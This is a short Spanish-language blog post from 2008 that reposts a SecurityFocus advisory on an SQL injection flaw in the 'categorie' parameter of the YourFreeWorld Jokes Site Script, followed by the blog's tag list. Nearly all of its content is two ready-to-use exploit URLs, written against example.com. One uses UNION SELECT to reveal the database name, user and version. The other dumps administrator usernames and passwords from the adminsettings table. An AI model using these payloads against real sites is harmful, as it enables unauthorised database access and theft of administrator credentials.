viernes, 7 de noviembre de 2008

YourFreeWorld Jokes Site Script 'categorie' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/jokesite/jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),user(),char(58),version()),char)/*

http://www.example.com/jokes.php?catagorie=-5+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password)+from+adminsettings--

fuente:
http://www.securityfocus.com/bid/28963/exploit
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)